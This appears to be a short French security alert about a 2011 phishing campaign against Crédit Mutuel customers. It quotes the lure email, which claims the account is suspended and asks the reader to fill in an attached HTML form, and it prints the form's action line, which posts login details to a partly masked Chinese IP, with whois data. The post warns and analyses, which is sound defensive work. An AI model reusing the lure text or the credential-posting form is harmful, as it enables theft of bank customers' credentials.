Une campagne de phishing est en cours, elle vise les clients du crédit mutuel.

Le mail est en deux parties:

1- Un message informant que suite à un “accès non autorisé” (sic) le compte de la cible à été suspendu et qu’il faut rensiegner le formulaire HTML joint pour le réactiver.

Voici le texte original :

En raison de l'accès non autorisé est possible, nous avons 
temporairement
désactivé votre compte.

Pour lever la suspension, s'il vous plaît confirmer que votre 
compte n'a pas été
volés.
Pour ce faire, s'il vous plaît télécharger et remplir le 
formulaire ci-joint html.

Désolé pour le dérangement, mais votre sécurité est notre top
priorité.

Cordialement,
service clientèle

Crédit Mutuel © 2011

On notera la faible qualité de ce message….

2- Un formulaire HTML en pièce jointe qui  invite à entrer les informations confidentielles de connexion:

En visualisant les sources, on constate que ce formulaire est posté vers une IP Chinoise :

<form method="post" action="http://61.163.67.9XX/formulaire.php">

route:      61.163.0.0/16
descr:     CNC Group CHINA169 Henan Province Network
country:  CN
origin:     AS4837
mnt-by:   MAINT-CNCGROUP-RR